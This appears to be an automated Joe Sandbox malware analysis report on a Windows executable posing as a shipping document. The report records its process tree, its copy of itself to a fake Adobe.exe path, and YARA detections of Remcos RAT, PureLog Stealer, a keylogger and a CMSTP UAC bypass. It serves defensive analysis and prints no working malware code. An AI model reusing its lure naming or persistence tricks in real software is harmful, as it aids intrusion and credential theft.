                                                    date: Thu, 28 Nov 2024 23:01:07 GMT
                                                    server: Apache
                                                    content-length: 963
                                                    content-type: application/json; charset=utf-8
                                                    cache-control: public, max-age=300
                                                    access-control-allow-origin: *
                                                    Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

                                                    Target ID:0
                                                    Start time:18:00:57
                                                    Start date:28/11/2024
                                                    Path:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
                                                    Imagebase:0x900000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2058181957.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2042713103.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:18:00:58
                                                    Start date:28/11/2024
                                                    Path:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
                                                    Imagebase:0xb10000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:18:00:58
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x10000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2064810127.00000000024EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:18:01:00
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xb0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:18:01:00
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x2d0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:18:01:00
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x760000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:18:01:09
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xb30000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:18:01:11
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xec0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:18:01:17
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x3e0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:18:01:18
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0x840000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:18:01:26
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xaf0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:18:01:26
                                                    Start date:28/11/2024
                                                    Path:C:\ProgramData\Adobe\Adobe.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\ProgramData\Adobe\Adobe.exe"
                                                    Imagebase:0xfb0000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:10.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:120
                                                      Total number of Limit Nodes:9

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4']q$TJbq$Te]q$paq$xb`q
                                                      • API String ID: 0-1123639052
                                                      • Opcode ID: b5d0c518ff4d2f321d7f81c80aca50cd2a767436f628723431541f03ad577b71
                                                      • Instruction ID: b83e14264b0dfb31aac7e0e2f90deae79c2fec74f2e4a41ac3a14c319fbff761
                                                      • Opcode Fuzzy Hash: b5d0c518ff4d2f321d7f81c80aca50cd2a767436f628723431541f03ad577b71
                                                      • Instruction Fuzzy Hash: 5EB2D5B5E10229CFDB54CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4']q
                                                      • API String ID: 0-1259897404
                                                      • Opcode ID: a734d27d8c97711f83f1d029cd65452257b25701d348e102eb8fdadb903669b9
                                                      • Instruction ID: aa3ca5566324629c7c2ae2583ddf276e1e7bc2a44b54f2816352fbe087865b76
                                                      • Opcode Fuzzy Hash: a734d27d8c97711f83f1d029cd65452257b25701d348e102eb8fdadb903669b9
                                                      • Instruction Fuzzy Hash: 42610971E152059FD709EF7AE98169ABFF6FF88304F14C56AD0089B229FB345806CB40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b60f50cc035d50bc77cd2b9de191162afece0e600c431983f5b2c5959b7cca69
                                                      • Instruction ID: 86bf7934b383d8ac61ddf78fe7f439c330129d88ea20934b5f9e18e5b1a9ba55
                                                      • Opcode Fuzzy Hash: b60f50cc035d50bc77cd2b9de191162afece0e600c431983f5b2c5959b7cca69
                                                      • Instruction Fuzzy Hash: EC92A234A51219CFCB24EB64C998BE9B7B1FF89301F1581E9D9096B361DB31AE85CF40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af82d4ee52d65c3d84c11bd8e936c2c4db3792c9bc79e67c009e4b95afe8b8c0
                                                      • Instruction ID: ce53a81d55a62c84b1a8e499c253a33acc1d1e284769b2c6b9b5d96f7b57e14d
                                                      • Opcode Fuzzy Hash: af82d4ee52d65c3d84c11bd8e936c2c4db3792c9bc79e67c009e4b95afe8b8c0
                                                      • Instruction Fuzzy Hash: 2892A334A51219CFCB24EB64C998BE9B7B1FF89301F1181E9D9096B361DB31AE85DF40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b651b6356be0a8e0a5e2c4b9861e32a0b436b18aa9836391f9c680154c3b0da
                                                      • Instruction ID: 2e878d569678d481dab40a17cd967daf8dcab6aa1062d3efa82d650f9bd872a4
                                                      • Opcode Fuzzy Hash: 9b651b6356be0a8e0a5e2c4b9861e32a0b436b18aa9836391f9c680154c3b0da
                                                      • Instruction Fuzzy Hash: 04A1F1B4E25229CFDB14DFA6C8547EDFBB6BF8A300F109069D509AB251DB744985CF01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85f68b094f518fbc734d4a5fd3ffa3f12ce1acd0641f9e70877dd8305b766b37
                                                      • Instruction ID: e48754c96cf8b8c401c16ab3c0092bc0a063be38386bfc6b3bc68959d57aa2c3
                                                      • Opcode Fuzzy Hash: 85f68b094f518fbc734d4a5fd3ffa3f12ce1acd0641f9e70877dd8305b766b37
                                                      • Instruction Fuzzy Hash: 8CA103B4E25229CFDB14CFA6C8547EDFBB2BF8A300F1090AAD509AB251DB744985CF41
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd

                                                      Control-flow Graph (graph image omitted; basic blocks around the GetModuleHandleW call)
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02BBB07E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • API String ID: 4139908857-0

                                                      Control-flow Graph (graph image omitted; basic blocks around the CreateActCtxA call)
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02BB59C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • API String ID: 2289755597-0

                                                      Control-flow Graph (graph image omitted; basic blocks around the CreateActCtxA call)
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02BB59C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • API String ID: 2289755597-0

                                                      Control-flow Graph (graph image omitted; basic blocks around the CallWindowProcW call)
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05284101
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • API String ID: 2714655100-0

                                                      Control-flow Graph (graph image omitted; basic blocks around the DrawTextExW call)
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,072F3F7D,?,?), ref: 072F402F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • API String ID: 2175133113-0

                                                      Control-flow Graph (graph image omitted; basic blocks around the DrawTextExW call)
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,072F3F7D,?,?), ref: 072F402F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • API String ID: 2175133113-0

                                                      Control-flow Graph (graph image omitted; basic blocks around the DuplicateHandle call)
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BBD6D6,?,?,?,?,?), ref: 02BBD797
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • API String ID: 3793708945-0

                                                      Control-flow Graph (graph image omitted; basic blocks around the DuplicateHandle call)
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BBD6D6,?,?,?,?,?), ref: 02BBD797
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • API String ID: 3793708945-0

                                                      Control-flow Graph (graph image omitted; basic blocks around the GetModuleHandleW call)
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02BBB07E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • API String ID: 4139908857-0
                                                      APIs
                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,072F6B79,?,?), ref: 072F6D20
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • API String ID: 2962429428-0
                                                      APIs
                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,072F6B79,?,?), ref: 072F6D20
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • API String ID: 2962429428-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042303903.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11cd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042303903.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11cd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042303903.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11cd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction ID: 887521a2b2de6c9a5d49d4c0361f207a0bff3f2df2beebfed74ddfe90fd84bbd
                                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction Fuzzy Hash: C211CD72404240CFDF0ACF44D5C4B96BF61FB84324F24C6A9D9090A656C33AE45ACBA2
                                                      Memory Dump Source
